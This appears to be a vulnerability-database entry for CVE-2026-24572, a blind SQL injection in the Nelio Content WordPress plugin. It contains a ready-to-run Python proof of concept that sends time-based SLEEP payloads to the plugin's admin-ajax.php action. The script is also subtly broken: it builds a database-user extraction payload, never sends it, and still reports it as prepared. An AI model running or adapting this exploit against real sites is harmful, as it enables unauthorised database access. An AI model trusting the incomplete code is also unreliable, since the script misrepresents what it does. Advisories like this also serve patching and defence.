Security Vulnerability Report
中文
CVE-2026-24572 CVSS 8.5 HIGH

CVE-2026-24572

Published: 2026-01-23 15:16:15
Last Modified: 2026-04-28 15:16:16

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection.This issue affects Nelio Content: from n/a through <= 4.2.0.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Nelio Content <= 4.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target = "http://target-wordpress-site.com" # Blind SQL Injection PoC for CVE-2026-24572 # This PoC demonstrates time-based blind SQL injection def test_sqli(payload): """Test SQL injection with time-based blind technique""" # Nelio Content plugin endpoint vulnerable parameter endpoint = f"{target}/wp-admin/admin-ajax.php" params = { 'action': 'nelio_content_analytics_event', 'event_type': payload, 'post_id': '1' } start_time = time.time() response = requests.post(endpoint, data=params, timeout=30) elapsed = time.time() - start_time return elapsed > 25 # If response takes >25 seconds, injection successful # Example payload for database version extraction payload = "test' AND (SELECT * FROM (SELECT SLEEP(25))a) AND '1'='1" if test_sqli(payload): print("[+] SQL Injection confirmed - database is vulnerable") # Extract database user user_payload = "test' AND (SELECT * FROM (SELECT SLEEP(25) WHERE (SELECT user FROM dual)='wp_user')a) AND '1'='1" print("[+] Database user extraction payload prepared") else: print("[-] Injection test failed or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24572", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:15.210", "lastModified": "2026-04-28T15:16:15.817", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection.This issue affects Nelio Content: from n/a through <= 4.2.0."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en Nelio Software Nelio Content nelio-content permite Inyección SQL Ciega. Este problema afecta a Nelio Content: desde n/a hasta &lt;= 4.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/nelio-content/vulnerability/wordpress-nelio-content-plugin-4-1-0-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}